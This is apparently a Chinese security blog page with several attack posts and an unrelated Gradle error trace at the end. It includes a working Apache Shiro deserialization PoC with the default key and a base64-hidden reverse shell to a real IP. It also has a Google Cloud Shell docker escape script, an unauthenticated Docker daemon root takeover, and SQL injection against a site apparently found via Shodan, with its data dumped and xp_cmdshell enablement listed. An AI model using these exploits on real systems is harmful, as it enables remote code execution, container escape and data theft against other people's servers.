使用ysoserial进行流量监听,下面是ysoserial的jar包生成,懂得开发同学都懂。

git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -D skipTests

how-to-poc

使用poc代码获得对应的rememberMe的cookie值。

# -*- coding:utf-8 -*-
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
print "rememberMe={0}".format(payload.decode())
D:\bin4xin\code\shiro\shrio-poc\ysoserial\target> python .\shrio-poc.py 47.52.233.92:6666
rememberMe=W8BOhPe8Qdy8FJ5N9genqt4WjZaONr1NQ+dXgDCV1RrGHUwMfd8ljlA9AG64t7vzUesOp7YKsz6EFFHgyrq1qRqUiPFBnEBi/NNNpE2UR8CgMsf1KY2rbBurFv1Gwslv2+SL7hy3YNq9cpPWm5S8o+nJpa6IyI9cZ+n7a+6hjB4Yfnf89u3BLi4AxOXL35SotH2AdSX2iZrWgGAcah9oW21JwpC2zj4YMjsGf2tPYUysP873bYYHuSIohaXf3bcq4YuQajMctVmM3IvjeY5Ggva9QRUvo5B1o0sPNHdXGwn/z9t/KWcSeTWE+Dt2f95a9QjEIoic6s88Tv0SKjY6UdCmTxN3vVE8rs1haiA48R1CuUQQiWa9V28m2qkonX9aUEUl4kTGGvF+Y5eB4MaNTw==

抓包,前台登录拦包,勾选Remember Me,截获数据包,替换cookie构造数据包:

POST /doLogin HTTP/1.1
underattack-host: underattack-host:8080
Content-Length: 55
Cache-Control: max-age=0
Origin: http://underattack-host:8080
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://underattack-host:8080/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: rememberMe=RFUadguvSoq4kMm3ZwnkO/MHiokCrqrCURXUqUWaXLBM7/fBF65qvjWDFZeh49zHDRm5oKPU1AhmbEBaYRp3ASrQpHdp7mYrChOi51tmq9qkzWemDnjbUXtp8B6RF1EUNV2q2tKaKlf4AAR1hZIRJGbz4CpLeumNAeWB98f6/T0GaWJGGve9rP6l9/7iU5Y9Xj4ZmSBP6LgMHYF3TJ2DDdTNI4nPITeQI3S+9ol/BmT14Be5m0ENfOkm1cdm3L8Rj/pbeE842Y3nUioEdAXizCrOsCYT+u2QTWHt1YZLmB/xsfQvEV5bRpRJeRv/ps7V00PiXvCeaPQoDs541wqB75+/RRAdqU8TWnJE7YhvQVkxTRLvCjBTtwfkgA3XVA8X+518nh0wSoj8/Ajaoi5MbA==
Connection: close

username=asdmnin&password=asdasd&rememberme=remember-me

使用包监听6666端口:

root@iZj6cgn7odv59wmjjhe6zwZ:/home/tool/shiro_poc/POC-2/ysoserial/target# java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny41Mi4yMzMuOTIvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}'
* Opening JRMP listener on 6666

发包,我们看到jrmp监听的端口已经有流量回流回来了,如下:

Have connection from /underattack-host:58272
Reading message...
Is DGC call for [[0:0:0, 356978429], [0:0:0, 2006635131]]
Sending return with payload for obj [0:0:0, 2]
Closing connection
Have connection from /underattack-host:58274
Reading message...
Is DGC call for [[0:0:0, 356978429], [0:0:0, -1104978848], [0:0:0, 2006635131]]
Sending return with payload for obj [0:0:0, 2]
Closing connection

以上。

[Read More]

「DOCKER」:谈谈docker逃逸那点事

May 17, 2020. | By: Bin4xin

google-cloud-shell-docker逃逸

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
Welcome to Cloud Shell! Type "help" to get started.
Your Cloud Platform project in this session is set to avid-rope-267508.
Use “gcloud config set project [PROJECT_ID]” to change to a different project.
chihou_pro@cloudshell:~ (avid-rope-267508)$ sudo su
root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/home/chihou_pro# ls
README-cloudshell.txt

很明显的看到,使用了docker容器,参考

root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/home/chihou_pro# cat /proc/1/cgroup
12:hugetlb:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
11:perf_event:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
10:cpu,cpuacct:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
9:cpuset:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
8:memory:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
7:devices:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
6:freezer:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
5:blkio:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
4:rdma:/
3:pids:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
2:net_cls,net_prio:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
1:name=systemd:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
0::/system.slice/containerd.service

发现docker

我们可以看到kubepods等关键词,浏览了文件系统之后,注意到有2个Docker unix套接字可用。在/run/docker.sock中,这是我们在Cloud Shell中运行的Docker客户端的默认路径。

root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/# cat run/
docker/         docker.sock     google/         metrics/        postgresql/     sshd/           supervisor.pid  xtables.lock
docker.pid      docker-ssd.pid  lock/           mount/          rsyslogd.pid    sshd.pid        utmp

/google/host/var/run/docker.sock套接字,这是第二个。

root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/# ls /google/host/var/run/
agetty.reload  cloud-init        command-recorder  crash_reporter  docker      dockershim.sock  initctl  lockbox  lvm         metrics  sshd.pid  systemd  tmpfiles.d  user  vm
blkid          cloudshell-creds  containerd        dbus            docker.pid  docker.sock      lock     log      machine-id  mount    sudo      theia    udev        utmp  xtables.lock

然后根据上面的可利用套接字准备一个bash文件进行docker逃逸:-) new a bash file to escape docker in google_cloud_shell.

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name LiveOverflow-container -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start LiveOverflow-container
sudo docker -H unix:///google/host/var/run/docker.sock exec -it LiveOverflow-container /bin/sh

运行bash文件

root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/home/chihou_pro# bash docker_escape.sh
latest: Pulling from library/alpine
Digest: sha256:39eda93d15866957feaee28f8fc5adb545276a64147445c64992ef69804dbf01
Status: Image is up to date for alpine:latest
docker.io/library/alpine:latest
docker: Error response from daemon: Conflict. The container name "/LiveOverflow-container" is already in use by container "2e2896994c459d7be0a6acb613c8be509ef5158cb97ddac4b5e30b2fed770d56". You have to remove (or rename) that container to be able to reuse that name.
See 'docker run --help'.
LiveOverflow-container
/ # whoami
root

如上,逃逸成功




docker daemon api漏洞复现

验证漏洞存在:

[root@iZ2ze9ebgot9gy5c2mi5ecZ unauthorized-rce]# curl http://vuln_docker_ip:2375/info
{"ID":"OY55:HR25:LKHP:XTLU:LCID:Y64D:46WQ:4T5U:U2SF:5PVW:R7I3:T6KV","Containers":2,"ContainersRunning":1,"ContainersPaused":0,"ContainersStopped":1,"Images":1,"Driver":"overlay2","DriverStatus":[["Backing Filesystem","extfs"],["Supports d_type","true"],["Native Overlay Diff","true"]],"SystemStatus":null,"Plugins":{"Volume":["local"],"Network":["bridge","host","macvlan","null","overlay"],"Authorization":null,"Log":["awslogs","fluentd","gcplogs","gelf","journald","json-file","logentries","splunk","syslog"]},"MemoryLimit":true,"SwapLimit":true,"KernelMemory":true,"CpuCfsPeriod":true,"CpuCfsQuota":true,"CPUShares":true,"CPUSet":true,"IPv4Forwarding":true,"BridgeNfIptables":false,"BridgeNfIp6tables":false,"Debug":false,"NFd":29,"OomKillDisable":true,"NGoroutines":51,"SystemTime":"2020-05-22T02:44:08.778253143Z","LoggingDriver":"json-file","CgroupDriver":"cgroupfs","NEventsListener":0,"KernelVersion":"3.10.0-1062.12.1.el7.x86_64","OperatingSystem":"Alpine Linux v3.7 (containerized)","OSType":"linux","Architecture":"x86_64","IndexServerAddress":"https://index.docker.io/v1/","RegistryConfig":{"AllowNondistributableArtifactsCIDRs":[],"AllowNondistributableArtifactsHostnames":[],"InsecureRegistryCIDRs":["127.0.0.0/8"],"IndexConfigs":{"docker.io":{"Name":"docker.io","Mirrors":[],"Secure":true,"Official":true}},"Mirrors":[]},"NCPU":2,"MemTotal":3973296128,"GenericResources":null,"DockerRootDir":"/var/lib/docker","HttpProxy":"","HttpsProxy":"","NoProxy":"","Name":"14e1a228e781","Labels":[],"ExperimentalBuild":false,"ServerVersion":"18.03.0-ce","ClusterStore":"","ClusterAdvertise":"","Runtimes":{"runc":{"path":"docker-runc"}},"DefaultRuntime":"runc","Swarm":{"NodeID":"","NodeAddr":"","LocalNodeState":"inactive","ControlAvailable":false,"Error":"","RemoteManagers":null},"LiveRestoreEnabled":false,"Isolation":"","InitBinary":"docker-init","ContainerdCommit":{"ID":"cfd04396dc68220d1cecbe686a6cc3aa5ce3667c","Expected":"cfd04396dc68220d1cecbe686a6cc3aa5ce3667c"},"RuncCommit":{"ID":"4fc53a81fb7c994640722ac585fa9ca548971871","Expected":"4fc53a81fb7c994640722ac585fa9ca548971871"},"InitCommit":{"ID":"949e6fa","Expected":"949e6fa"},"SecurityOptions":["name=seccomp,profile=default"]}

如上,访问info目录返回了关于docker的信息。直接攻击机运行命令:

root@shell:/home/tool/docker/unauth_rce# docker -H=tcp://vuln_docker_ip:2375 run -it -v /:/tmp --entrypoint /bin/sh alpine:latest
/ # whoami
root
/ # uname -a
Linux aa5ae15c12f0 3.10.0-1062.12.1.el7.x86_64 #1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64 Linux
/ # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:02
          inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:8 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:656 (656.0 B)  TX bytes:0 (0.0 B)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

震惊有木有,我们可以在靶场上复现,现在在撒旦上、fofa上都很少能找到这种程度的漏洞了;在宿主机上查看docker信息:

[root@shell unauthorized-rce]# bash /home/docker_shell_exe.sh
docker0   Link encap:Ethernet  HWaddr 02:42:ED:E8:4E:97
          inet addr:172.17.0.1  Bcast:172.17.255.255  Mask:255.255.0.0
          inet6 addr: fe80::42:edff:fee8:4e97/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:266 (266.0 B)

eth0      Link encap:Ethernet  HWaddr 02:42:AC:14:00:02
          inet addr:172.20.0.2  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:acff:fe14:2/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:45363 errors:0 dropped:0 overruns:0 frame:0
          TX packets:41902 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:10257217 (9.7 MiB)  TX bytes:3704534 (3.5 MiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:55 errors:0 dropped:0 overruns:0 frame:0
          TX packets:55 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:6487 (6.3 KiB)  TX bytes:6487 (6.3 KiB)

返回的信息如上,与我们所使用的靶机机器一致;

[Read More]

「渗透」:SQL注入新姿势:)

May 15, 2020. | By: Bin4xin

由于一些机缘巧合,发现了一些SQL注入的新姿势,记录一下;

记录就是一个简单的练手记录,感觉非常有意思;

目标确定

在shodan、fofa上搜asmx,找到疑似存在wsdl注入的站,大概的是这样的:http://vuln_ip:8081/WebService1.asmx?WSDL,一般我们可以通过手工的方式去尝试注入,这样的站访问进去后是类似xml的文件,里面是各种与服务器交互的参数,比如登录页面的username、passwd参数,开发者们都已经配置好这些参数; 如下,这是一个参数对应的xml标签:

<s:element name="HelloWorldResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="HelloWorldResult" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>

sqlmap一把梭

wsdl注入

我们手工的方式是构造一个SOAP对应的参数的post包发给asmx网页。post包如下:

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://tempuri.org/">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <urn:HelloWorldResult>
           <urn:ins>1*</urn:ins>
        </urn:HelloWorldResult>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

大致的一个构造思路就是这样的,然后观察服务器数据库的报错情况,我们可以直接把数据post包拿过来跑:

root@#:/home/tool/sqlmap-data/wsdl-inject# sqlmap -r net-test1.txt --batch
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.2.4#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end 
user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not 
responsible for any misuse or damage caused by this program

[*] starting at 11:03:20

[11:03:54] [INFO] testing Microsoft SQL Server
[11:03:54] [INFO] confirming Microsoft SQL Server
[11:04:24] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[11:04:24] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[11:04:24] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 19 times
[11:04:24] [INFO] fetched data logged to text files under '/root/.sqlmap/output/underattack-host'

[*] shutting down at 11:04:24

注入payload单独发出来,如下:

---
Parameter: SOAP #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://tempuri.org/">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <urn:getcode>
           <urn:ins>1' AND 1597 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (1597=1597) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(120)+CHAR(113))) AND 'DZUD'='DZUD</urn:ins>
        </urn:getcode>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://tempuri.org/">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <urn:getcode>
           <urn:ins>1' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(98)+CHAR(122)+CHAR(113)+CHAR(72)+CHAR(117)+CHAR(78)+CHAR(90)+CHAR(84)+CHAR(69)+CHAR(80)+CHAR(98)+CHAR(85)+CHAR(102)+CHAR(80)+CHAR(86)+CHAR(81)+CHAR(73)+CHAR(83)+CHAR(102)+CHAR(106)+CHAR(101)+CHAR(70)+CHAR(113)+CHAR(101)+CHAR(109)+CHAR(68)+CHAR(86)+CHAR(76)+CHAR(84)+CHAR(73)+CHAR(122)+CHAR(99)+CHAR(66)+CHAR(82)+CHAR(119)+CHAR(66)+CHAR(78)+CHAR(75)+CHAR(98)+CHAR(102)+CHAR(107)+CHAR(99)+CHAR(88)+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- aKgd</urn:ins>
        </urn:getcode>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
---

我们可以偷懒一下,直接payload拿过来看看反包有什么不一样的地方~看到差别了吗。

Type: 报错注入(error-based):
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 459

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request.---&gt;在将 varchar 值 'qpbzq1qzkxq' 转换成数据类型</faultstring><detail/></soap:Fault></soap:Body></soap:Envelope>
=======================================================================================
=======================================================================================
Type: 联合查询(UNION query),输出的信息比较多,限于篇幅,放上一些数据:

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 20111

<c_me_com>10005</c_me_com><c_me_no>14</c_me_no><c_me_bt>10.11.201.233</c_me_bt><c_me_command>0</c_me_command><c_me_lenght>2</c_me_lenght><c_me_start>2000</c_me_start><c_me_lastvalue>0</c_me_lastvalue><c_me_maxstep>50</c_me_maxstep><c_me_webcode>com7.db001.db001t</c_me_webcode><c_me_by19>0.00</c_me_by19><c_me_by20>1</c_me_by20><c_me_lastdate4>2018-08-08T05:00:24.677+08:00</c_me_lastdate4><c_me_lastvalue4>313</c_me_lastvalue4><c_me_lastdate3>2018-08-08T06:03:06.137+08:00</c_me_lastdate3><c_me_lastvalue3>313</c_me_lastvalue3><c_me_lastdate2>2018-08-08T07:05:47.173+08:00</c_me_lastdate2><c_me_lastvalue2>313</c_me_lastvalue2><c_me_lastdate1>2018-08-08T08:08:28.543+08:00</c_me_lastdate1><c_me_lastvalue1>313</c_me_lastvalue1><c_me_lastsuredate>2018-08-08T11:11:05.27+08:00</c_me_lastsuredate><c_me_lastsurevalue>313</c_me_lastsurevalue></d2></ds></diffgr:diffgram></getcodeResult></getcodeResponse></soap:Body></soap:Envelope>

常规查询:

当然在平常注入的过程中,不仅仅存在上述的注入,我们更多的是常见的盲注、联合查询或者是布尔盲注、时间盲注等等;我们这里举得例子同样存在,当然也是万能的awvs跑出来的:

Discovered by Blind SQL Injection
URL encoded POST input ins was set to eizSls
查看不同输入的符号对应的trueflase值单数的%27输入进去我们可以看到是flase双数输入进去则为true
462' => ERROR
462'' => OK
GwHgee''' => ERROR
7Ahb38'''' => OK
CXBMlX''''' => ERROR
xgBDwt'''''' => OK
eizSls''''''' => ERROR

老方法,直接SQLMAP跑~

POST /WebService1.asmx/getcode HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://vuln_ip:8081/WebService1.asmx?WSDL
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 17
Host: vuln_ip:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

ins=eizSls

跑出来也是一样的效果,当然是一样的注入点,都是getcode这个功能接口跑的数据:

POST parameter 'ins' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: ins (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: ins=eizSls' AND 7541 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7541=7541) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'EJIL'='EJIL

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: ins=eizSls' UNION ALL SELECT NULL,CHAR(113)+CHAR(120)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(67)+CHAR(85)+CHAR(78)+CHAR(111)+CHAR(108)+CHAR(112)+CHAR(72)+CHAR(81)+CHAR(82)+CHAR(108)+CHAR(89)+CHAR(68)+CHAR(67)+CHAR(99)+CHAR(105)+CHAR(109)+CHAR(105)+CHAR(86)+CHAR(121)+CHAR(99)+CHAR(122)+CHAR(90)+CHAR(109)+CHAR(112)+CHAR(98)+CHAR(88)+CHAR(89)+CHAR(68)+CHAR(90)+CHAR(101)+CHAR(71)+CHAR(100)+CHAR(118)+CHAR(81)+CHAR(114)+CHAR(83)+CHAR(101)+CHAR(90)+CHAR(117)+CHAR(100)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- HqcH
---

信息搜集

康康user,发现是dbo。SQL SERVER中[dbo]的解释:

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[11:16:02] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql-shell> user
[11:16:13] [INFO] fetching SQL query output: 'user'
user:    'dbo'

看一下服务器是否站库分离:

sql-shell> select @@servername;
[11:17:21] [INFO] fetching SQL SELECT statement query output: 'select @@servername'
select @@servername;:    'WIN-VO157IKGT24'
sql-shell> select host_name();
[11:17:25] [INFO] fetching SQL SELECT statement query output: 'select host_name()'
select host_name();:    'WIN-VO157IKGT24'

两个都是WIN-VO157IKGT24所以应该没有站库分离。看一下数据库版本号

sql-shell> Select @@version
[11:17:34] [INFO] fetching SQL SELECT statement query output: 'Select @@version'
Select @@version:    'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) \n\tApr  2 2010 15:48:46 \n\tCopyright (c) Microsoft Corporation\n\tStandard Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)\n'
root@#:/home/tool/sqlmap-data/wsdl-inject# sqlmap -r net-test1.txt --batch --dbs
---
[11:04:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[11:04:34] [INFO] fetching database names
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] ytems

[11:04:35] [INFO] fetched data logged to text files under '/root/.sqlmap/output/underattack-host'

[*] shutting down at 11:04:35

提权

dbcc addextendedproc ("sp_oacreate","odsole70.dll");
dbcc addextendedproc ("xp_cmdshell","xplog70.dll");

to be continued;

[Read More]

  • gradle打包
    • https://blog.csdn.net/EthanCo/article/details/52064044
    • https://www.kutu66.com/GitHub/article_105897
    • https://jingyan.baidu.com/article/c45ad29c20a123051753e2af.html
.\gradlew.bat task
Active code page: 65001
Failed to notify ProjectEvaluationListener.afterEvaluate(), but primary configuration failure takes precedence.
java.lang.RuntimeException: SDK location not found. Define location with sdk.dir in the local.properties file or with an ANDROID_HOME environment variable.
        at org.gradle.initialization.DefaultGradleLauncher.doBuildStages(DefaultGradleLauncher.java:122)
        at org.gradle.initialization.DefaultGradleLauncher.access$200(DefaultGradleLauncher.java:32)
        at org.gradle.initialization.DefaultGradleLauncher$1.create(DefaultGradleLauncher.java:99)
        at org.gradle.initialization.DefaultGradleLauncher$1.create(DefaultGradleLauncher.java:93)
        at org.gradle.internal.progress.DefaultBuildOperationExecutor.run(DefaultBuildOperationExecutor.java:90)
        at org.gradle.internal.progress.DefaultBuildOperationExecutor.run(DefaultBuildOperationExecutor.java:62)
        at org.gradle.initialization.DefaultGradleLauncher.doBuild(DefaultGradleLauncher.java:93)
        at org.gradle.initialization.DefaultGradleLauncher.run(DefaultGradleLauncher.java:82)
        at org.gradle.launcher.exec.InProcessBuildActionExecuter$DefaultBuildController.run(InProcessBuildActionExecuter.java:94)
        at org.gradle.tooling.internal.provider.ExecuteBuildActionRunner.run(ExecuteBuildActionRunner.java:28)
        at org.gradle.launcher.exec.ChainingBuildActionRunner.run(ChainingBuildActionRunner.java:35)
        at org.gradle.launcher.exec.InProcessBuildActionExecuter.execute(InProcessBuildActionExecuter.java:43)
        at org.gradle.launcher.exec.InProcessBuildActionExecuter.execute(InProcessBuildActionExecuter.java:28)
        at org.gradle.launcher.exec.ContinuousBuildActionExecuter.execute(ContinuousBuildActionExecuter.java:78)
        at org.gradle.launcher.exec.ContinuousBuildActionExecuter.execute(ContinuousBuildActionExecuter.java:48)
        at org.gradle.launcher.exec.DaemonUsageSuggestingBuildActionExecuter.execute(DaemonUsageSuggestingBuildActionExecuter.java:51)
        at org.gradle.launcher.exec.DaemonUsageSuggestingBuildActionExecuter.execute(DaemonUsageSuggestingBuildActionExecuter.java:28)
        at org.gradle.launcher.cli.RunBuildAction.run(RunBuildAction.java:43)
        at org.gradle.internal.Actions$RunnableActionAdapter.execute(Actions.java:170)
        at org.gradle.launcher.cli.CommandLineActionFactory$ParseAndBuildAction.execute(CommandLineActionFactory.java:237)
        at org.gradle.launcher.cli.CommandLineActionFactory$ParseAndBuildAction.execute(CommandLineActionFactory.java:210)
        at org.gradle.launcher.cli.JavaRuntimeValidationAction.execute(JavaRuntimeValidationAction.java:35)
        at org.gradle.launcher.cli.JavaRuntimeValidationAction.execute(JavaRuntimeValidationAction.java:24)
        at org.gradle.launcher.cli.CommandLineActionFactory$WithLogging.execute(CommandLineActionFactory.java:206)
        at org.gradle.launcher.cli.CommandLineActionFactory$WithLogging.execute(CommandLineActionFactory.java:169)
        at org.gradle.launcher.cli.ExceptionReportingAction.execute(ExceptionReportingAction.java:33)
        at org.gradle.launcher.cli.ExceptionReportingAction.execute(ExceptionReportingAction.java:22)
